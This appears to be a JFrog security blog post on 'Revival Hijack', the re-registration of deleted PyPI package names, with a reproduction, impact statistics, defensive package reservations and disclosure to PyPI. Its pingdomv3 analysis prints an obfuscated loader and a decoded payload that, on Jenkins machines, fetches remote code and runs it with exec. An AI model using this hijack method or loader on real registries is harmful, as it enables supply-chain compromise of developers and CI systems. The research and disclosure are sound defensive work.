Revival Hijack – PyPI hijack technique exploited in the wild, puts 22K packages at risk

Summary: JFrog’s security research team has identified a new supply chain attack technique called “Revival Hijack,” which allows malicious actors to hijack removed PyPI packages, potentially leading to widespread malware distribution. The team has taken proactive measures to protect the PyPI community by reserving vulnerable packages and raising awareness about this significant threat.

Threat Actor: Malicious actors | malicious actors
Victim: PyPI community | PyPI

Key Point :

  • The “Revival Hijack” technique exploits the immediate availability of package names after deletion, allowing attackers to register malicious versions of previously legitimate packages.
  • JFrog’s analysis revealed that over 22,000 packages on PyPI are vulnerable to this attack, highlighting the urgent need for improved security measures.
  • Proactive actions taken by JFrog, including reserving high-download packages with benign versions, have successfully thwarted potential hijacking attempts.

Revival Hijack - PyPI hijack technique exploited in the wild, puts 22K packages at risk

Revival Hijack - PyPI hijack technique exploited in the wild, puts 22K packages at risk

JFrog’s security research team continuously monitors open-source software registries, proactively identifying and addressing potential malware and vulnerability threats to foster a secure and reliable ecosystem for open-source software development and deployment. This blog details a PyPI supply chain attack technique the JFrog research team discovered had been recently exploited in the wild. This attack technique involves hijacking PyPI software packages by manipulating the option to re-register them once they’re removed from PyPI’s index by the original owner; a technique we’ve dubbed “Revival Hijack”.

Our real-world analysis on PyPI proved the  “Revival Hijack” attack method could be used to hijack 22K existing PyPI packages and subsequently lead to hundreds of thousands of malicious package downloads. Fortunately, our proactive measures thwarted bad actor efforts before significant damage could occur.

We will describe the effectiveness of this attack and how attackers already used this method to hijack the “pingdomv3” package. Our aim is to raise awareness to this possible attack vector, and share the actions we currently performed to protect the PyPI community from this hijack technique.

What’s included in this post:

What is the “Revival Hijack” technique?

One of the most popular attack vectors on users of open-source software repositories is typosquatting, where malicious actors register packages with names slightly altered from popular ones.

Typosquatting attack vector

Typosquatting attack vector

Developers may accidentally install these deceptive packages, leading to potential security breaches. Although this method was once effective, its reliance on human error has been increasingly mitigated by modern development environments, reducing its effectiveness in corporate settings.

In our analysis of the latest malicious packages in PyPI, we have observed an interesting PyPI policy relating to removed packages. When developers remove their projects from the PyPI repository, the associated package names immediately become available for registration by any other user. The only safeguard is a dialog box that warns the original developers about the potential consequences of their actions –

Project deletion dialog

Project deletion dialogProject deletion dialog

As stated, unfortunately once a popular project is deleted, attackers can easily hijack the same package name and subsequently infect any user that tries to update that package to the latest version (or – reinstalls it from scratch, which is popular in CI/CD machines that run a static pipeline) –

Illustration of the “Revival Hijack” PyPI attack

Illustration of the “Revival Hijack” PyPI attackIllustration of the “Revival Hijack” PyPI attack

This Hijack technique is extremely powerful since –

  1. The technique does not rely on the victim making a mistake when installing the package (unlike typosquatting which requires the victim to make a typo)
  2. Updating a “once safe” package to its latest version is viewed as a safe operation by many users (although it shouldn’t!)
  3. Many CI/CD machines are already set up to install these packages automatically

Reproducing the attack

In order to test the viability of the Revival Hijack attack, we reproduced it in a safe manner. Our experiments revealed more disturbing behavior in the handling of removed packages.

To reproduce the attack, we created an empty package named revival-package version 1.0.0 and published it from the origin_author account.

“Safe” package for testing Revival Hijack

“Safe” package for testing Revival Hijack“Safe” package for testing Revival Hijack

Then we removed the project and published a package with the same name from a different account: new_author, using version 4.0.0.

“Hijacked” package for testing Revival Hijack

“Hijacked” package for testing Revival Hijack“Hijacked” package for testing Revival Hijack

The screenshot above confirms that we accomplished this without any issues—the versions belonging to the original user were removed entirely and replaced by the new version from the new “malicious” user.

The PyPI repository has some safeguards against impersonation – namely, the ability to distinguish between the author’s name in the package metadata and the actual user who published the package. This measure helps prevent unauthorized users from falsely assuming the identity of legitimate authors.

Unverified details of the package

Unverified details of the packageUnverified details of the package

However, these safeguards do not seem to mitigate the “Revival Hijack” scenario. When we ran pip to show any outdated packages, it happily showed our imposter package as “just a new version” (4.0.0) of the original package – same name but vastly different code!

$ pip list --outdated
Package           Version Latest Type
----------------- ------- ------ -----
pip               23.0.1  24.0   wheel
revival-package   1.0.0   4.0.0  wheel

The pip install --upgrade command doesn’t show any warnings as well, and replaces the original package with our imposter package:

$ pip install --upgrade revival-package
Requirement already satisfied: revival-package in ./lib/python3.10/site-packages (1.0.0)
Collecting revival-package
  Downloading revival-package-4.0.0-py3-none-any.whl (1.2 kB)
Installing collected packages: revival-package
  Attempting uninstall: revival-package
    Found existing installation: revival-package 1.0.0
    Uninstalling revival-package-1.0.0:
      Successfully uninstalled revival-package-1.0.0
Successfully installed revival-package-4.0.0

Updating the hijacked package

Our experiment demonstrates that any removed package can be hijacked immediately and easily after its removal. pip won’t show any warnings despite the fact that the package’s author has changed.

The widespread potential of “Revival Hijack”

After demonstrating that hijacking removed legitimate packages can be easily done, we’ve decided to analyze how many packages on PyPI were susceptible to “Revival Hijack” – meaning that they were previously removed and can now be replaced/hijacked.

A naive count of removed PyPI packages landed us on 120K packages that can be hijacked. However – to understand the real-world potential of the attack, we applied additional filters on this list –

  • Considered only packages that had more than 100K downloads OR were active for more than six months.
  • Filtered out malicious and spam packages

After applying these filters, we were left with a list of more than 22K packages that are susceptible to “Revival Hijack”.

How common is package removal in PyPI? On average, 309 packages are removed each month, which means the attack surface of this technique is constantly growing.

Amount of removed PyPI packages per month

Amount of removed PyPI packages per monthRemoved PyPI packages per month
(The sudden spikes in removed packages can be attributed to large malware campaigns in PyPI)

Why would popular packages even get removed from PyPI? While examining the most popular removed packages, we saw a few reasons for the removal of these legitimate packages –

  1. Introduction of same functionality into official libraries or built-in APIs
  2. Lack of maintenance (maintainers can’t properly support the library any longer)
  3. Package gets re-written by the same developer (similar functionality, new package)

The JayDeBeApi3 package was removed due to official support being introduced

The JayDeBeApi3 package was removed due to official support being introducedThe JayDeBeApi3 package was removed due to official support being introduced

Taking action to protect the PyPI community

For the sake of securing these packages against hijacking, we created an account called security_holding, in homage to NPM’s method of replacing malicious packages with empty benign ones. Using this account, we “safely hijacked” (reserved) the most downloaded abandoned packages, and replaced them with empty packages (See Appendix A for the full list). By doing this, we’ve prevented real attackers from hijacking these packages and placing malicious code in them.

One of the abandoned packages we reserved in order to protect the PyPI community

One of the abandoned packages we reserved in order to protect the PyPI community
One of the abandoned packages we reserved in order to protect the PyPI community

Additionally, we used the version to make sure that our replacement (empty) packages are not pulled by users who had the old packages installed by running pip update.

The hijacked version number can be seen in the project’s GitHub page

The hijacked version number can be seen in the project’s GitHub pageThe hijacked version number can be seen in the project’s GitHub page

The real-world effectiveness of “Revival Hijack”

After successfully reserving these packages, we decided to check whether someone is actually downloading them, even though they’ve been removed for a while. We were surprised to see that in just a few days, we’ve already racked up thousands of downloads, and today (3 months later) we have almost 200K downloads of these “safely hijacked” packages. This seems to indicate that there are outdated jobs and scripts out there which are still looking for the deleted packages, or users that manually downloaded these packages due to typosquatting.

“Hijacked” package

# Downloads





















Download counts for the top 10 “safely hijacked” PyPI packages

These download counts show that the “Revival Hijack” threat is incredibly substantial!

Since our “hijack” package is empty, we cannot be certain that code execution would have occurred in 100% of these download cases (that would require a package with a “ping home” payload) but it would be very safe to say that code execution would occur in the vast majority of these cases. Hijacking packages with such high download counts can definitely be used as a supply chain attack with severe consequences.

Furthermore, these download numbers are actually a conservative estimate to the effectiveness of a real “Revival Hijack” attack. In order to cause the least amount of changes, we set the version of our empty “hijack” package to This prevents these packages from being pulled by pip update, since the already-installed version would always be higher than A real attacker would use a very high version (such as 9999.9999) in order to make sure pip update is affected as well, similar to a “Dependency Confusion” scenario.

What caused our reserved packages to have such a high download count, even though the packages were previously abandoned?

First, the removed package jaydebeapi3 is automatically recommended by the IntelliJ IDEA Python plugin instead of the more popular package jaydebeapi which has 150M downloads.

IntelliJ recommends installing JayDeBeApi3, even after it was removed from PyPI

IntelliJ recommends installing JayDeBeApi3, even after it was removed from PyPIIntelliJ recommends installing JayDeBeApi3, even after it was removed from PyPI

This caused JayDeBeApi3 to rack up a very large number of downloads after we re-registered it with our empty package.

Also, the packages discord-components and gingerit are used as dependencies in 80 popular GitHub repositories, that were forked more than 150 times. This makes them a perfect target for supply chain attacks –

Some GitHub repositories that depend on the “gingerit” PyPI package

Some GitHub repositories that depend on the “gingerit” PyPI packageSome GitHub repositories that depend on the “gingerit” PyPI package

Package name

# of Watchers on dependants

# of Forks on dependants

gingerit 305 146
discord-components 52 13
discord-buttons 15 2
gbdxtools 14 2

Aggregated popularity of packages that depend on our “safely hijacked” packages

PyPI’s existing package hijack mitigations

The PyPI registry contains measures to protect against registering deceptive packages using the method ProjectService.create_project. This method will prevent registering new PyPI packages in the following cases –

  • If the normalized package name matches an existing PyPI package name
  • If the normalized package name is in PyPI’s list of blacklisted packages (PyPI doesn’t publish this list)
  • If the normalized package name is similar to any existing PyPI package name. The similarity is computed using the following code:
SELECT lower(
            regexp_replace($1, '(.|_|-)', '', 'ig'),
            '(l|L|i|I)', '1', 'ig'
        '(o|O)', '0', 'ig'

PyPI’s SQL query to detect typosquatting when registering a new package

This code protects against simple typosquatting by replacing similar-looking characters with corresponding numbers or removing characters such as periods, underscores, and hyphens. This approach helps to prevent the registration of packages with names that are visually similar to existing ones, thereby mitigating the risk of deceptive or misleading package names.

These measures cover some techniques used by malware developers, but they are far from comprehensive. While they help prevent the creation of some malicious packages, they do not fully cover all potential vulnerabilities. For instance, the existing blacklist validation could effectively prevent the Revival Hijack attack if the names of removed projects were automatically added to the package blacklist.

A real-world Revival Hijack – The story of pingdomv3

Revival Hijack is not just a theoretical attack, but rather – our research team have already seen it exploited in the wild.

On April 12, 2024, our automated scanning systems detected unusual activity involving the ‘pingdomv3’ package. We observed that the package had acquired a new owner—a detail already marked as a potential red flag. On March 30th, the new owner released a seemingly benign update, rapidly followed by another version introducing a suspicious, Base64-obfuscated payload.

import logging
  from logging import NullHandler
  if NullHandler:
    import base64

Obfuscated malicious code from the “pingdomv3” package

These developments triggered immediate alerts within our malicious package scanning framework, prompting a thorough investigation into this malware’s potential risks and consequences.

Attack timeline

The package name and its infiltration method are particularly interesting. While typosquatting is the usual attack vector for users of open-source software repositories, this incident presented a more complex method.

The earliest version of the package, labeled 0.0.2, was released on November 29, 2019. This legitimate package contained a Python implementation of the Pingdom API, a website monitoring service acquired by the SolarWinds software development company in 2014.

Pingdomv3 attack timeline

Pingdomv3 attack timelinePingdomv3 attack timeline

The original package owner, cheneyyan, maintained a GitHub project which is now unavailable. They released several versions with minor modifications, with the last legitimate update being version 0.0.6 on April 7, 2020.

Subsequent updates ceased until March 27, 2024, when version 0.1 emerged. This version introduced only one method, invoked from, which displayed the following message:

'Hello, please avoid using this package as it is no longer supported. Contact!'

This indicates that the project was abandoned and advises against its use.

On March 30, a few days after the release of version 0.1, the original author removed the project and thus the project name became available for registration.

Summary: Pingdom v3 redeveloped
Author: Jinnis Author-email:

Almost immediately after the name became available, an account named Jinnis <> published a package under the same name, with a newer version number – 1.0.0. This new project claimed to be a redevelopment of the original package, pointing to a non-existent GitHub repository at This version contained the same code as the original.

A few days later, on April 12, 2024, the new developer released an update containing the malicious payload promptly detected by our team.

We immediately reported the malware to the PyPI maintainers and received confirmation that it had been removed. Quoting Mike Fiedler, the PyPI Safety & Security Engineer,

‘After today’s efforts, all versions have been removed, and the name has been prohibited from use.’

Payload analysis

The attackers used a typical Python malware payload – dynamic execution of a string after decoding it from Base64, no complex obfuscation techniques were used this time. We quickly extracted the original code for a detailed analysis of the malicious payload.

    import requests, os
    if "JENKINS_URL" in os.environ:
        r = requests.get('')

The attackers employed a laconic yet dangerous implementation of Python trojan malware. The code snippet operates within a conditional block that checks for the presence of JENKINS_URL in the environment variables, indicating execution within a Jenkins continuous integration setting.

Upon confirmation, it performs an HTTP GET request to the URL The response, expected to be Python code, is then directly executed using the exec function.

Unfortunately, all attempts to retrieve the payload from the server resulted in an empty response. This suggests that the attackers either delayed the delivery of the attack or designed it to be more targeted, possibly limiting it to a specific IP range.

Disclosure to PyPI maintainers

The JFrog security research team had reached out to PyPI’s security team in June and disclosed this issue. In our report, we’ve included technical explanations on how to carry out this attack, and also provided statistics about all the packages that were vulnerable to the attack.

PyPI’s security team responded by saying that –

  1. The topic of a policy change on deletion has been discussed on the Python forums, starting back in July 2022 and no conclusion has been reached as of mid-2023.
  2. PyPI informs end-users of the potential impacts of deletion –

  3. PyPI prevents specific versions of a package from being replaced, which is in-line with the recently-published Principles for Package Repository Security (General Capabilities, Level 2) from the OpenSSF working group.

While we agree that all of the above are worthwhile mitigations against this attack technique, as we have demonstrated this is still an extremely viable attack vector which leads to hundreds of thousands of malicious package downloads in real-world conditions.

We fully advocate PyPI to adopt a stricter policy which completely disallows a package name from being reused. In addition, PyPI users need to be aware of this potential attack vector when considering upgrading to a new package version.


The “Revival Hijack” method can be used by attackers as an easy supply chain attack, targeting organizations and infiltrating a wide variety of environments, allowing attackers to gain control of sensitive resources.
Although our proactive measure of reserving (“security holding”) these packages and adding safe copies will protect the PyPI community from attackers hijacking the most downloaded packages,

PyPI users should stay vigilant and make sure their CI/CD machines are not trying to install packages that were already removed from PyPI.

Using a vulnerable behavior in the handling of removed packages allowed attackers to hijack existing packages, making it possible to install it to the target systems without user interaction. Fortunately, this time, our proactive measures thwarted their efforts before significant damage could occur.

Appendix A: List of Packages Reserved by JFrog

Following is a list of packages that were taken over by JFrog’s security research team between May 21st and May 28th of 2024, in order to protect them from being hijacked by attackers using the Revival Hijack technique. Our team had reserved these packages using a user called security_holding, by uploading empty packages with a low version number ( to replace those abandoned packages.

Package name Date abandoned Original download count
aristotle-metadata-registry 2023-08-29 5:12:26 290820
atlasml 2019-08-06 19:04:36 372854
automation-rest-server 2024-05-12 8:23:15 411425
ayulexx 2021-10-26 16:11:10 659435
azure-iot-provisioning-device-client 2021-10-20 18:34:11 475019
bbarchivist 2022-01-17 16:11:34 967956
bdrk 2023-08-29 17:49:35 311483
bmlx-components 2023-11-15 4:00:19 711548
callisto-core 2020-08-20 21:12:25 675473
cdk-demo-construct 2023-12-15 14:42:14 460811
cdk-s3bucket-ng 2023-12-15 14:42:48 1733714
continuous-toolbox 2020-04-16 16:45:59 515633
darwin-shared 2022-06-02 18:58:20 293223
discord-buttons 2022-02-06 8:43:03 320966
discord-components 2022-08-06 16:02:20 7248408
discovery-behavioral-utils 2021-02-24 14:49:32 277874
django-aparnik 2021-01-10 6:40:40 652502
django-wizard-builder 2020-08-20 21:12:58 332256
docparser-remittance-processor 2023-06-18 5:42:16 302949
dofast 2023-09-15 7:11:34 289635
edavisuals 2022-10-03 13:06:55 35
fastscript 2024-05-01 0:42:56 285846
fluidasserts 2018-06-15 15:55:08 10555786
fluidattacks 2020-09-28 2:23:45 8119906
fxcmpy 2023-11-29 14:59:27 271068
gbdxtools 2022-01-03 17:52:59 353003
gingerit 2023-08-08 12:00:56 363463
hgstools 2023-07-04 9:07:27 617743
homebrew 2023-10-10 16:22:12 344357
jaydebeapi3 2019-04-04 9:38:20 621968
jhtalib 2023-07-28 14:49:12 329138
leadguru-common 2021-03-23 17:16:28 499810
leadguru-data 2021-03-23 17:05:37 519503
ledger-dev 2019-06-20 10:27:43 746878
lfc 2020-05-20 15:07:29 314241
lhcsmapi 2022-04-21 7:05:51 907312
li-pagador 2021-08-05 13:50:01 547684
lnhub-rest 2024-01-06 14:38:59 378363
malaya-gpu 2021-07-10 7:10:52 271898
napplib 2023-02-09 12:01:12 389274
nnabla-ext-cuda90 2021-08-16 3:17:43 288695
pipomatic-hudge-xtracta 2023-05-26 21:41:41 314270
pl-nightly 2022-05-25 16:25:10 495312
plantit-cli 2022-03-04 1:19:12 301349
plenum-dev 2019-06-20 10:24:08 1063672
print-nanny-client 2022-04-12 19:11:26 338748
pyhawk-with-a-single-extra-commit 2018-10-04 9:40:35 2904494
python-datamatrix 2023-01-23 15:57:02 355833
pytorch-ignite-nightly 2020-11-10 10:07:37 299036
quality-report 2023-03-30 11:54:36 1722367
rattail-locsms 2020-01-22 5:18:32 279016
rsscrawler 2021-04-18 10:57:59 314321
silverbot 2022-09-10 7:34:44 365814
slash-discord-py 2021-11-03 20:51:38 401675
sovrin-client-dev 2019-06-20 10:07:08 356086
sovrin-common-dev 2019-06-20 10:27:31 638631
sovrin-node-dev 2019-06-20 10:23:45 694709
stormpath 2021-10-10 16:38:22 304746
stumpf 2022-05-17 17:41:18 388793
super-ec2 2023-12-15 14:48:36 596893
tableau-rest-api 2021-04-16 19:03:18 464685
testgithubactionscookiecuttercppproject 2022-07-07 12:18:14 704976
tf-nightly-gpu-2-0-preview 2020-02-24 19:48:08 803363
threatconnect 2023-12-13 18:35:04 3506308
vmnet 2020-01-14 7:45:46 492185
zhulong 2023-02-23 11:06:54 407328

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The security research team’s findings and research play an important role in improving the JFrog Software Supply Chain Platform’s application software security capabilities.

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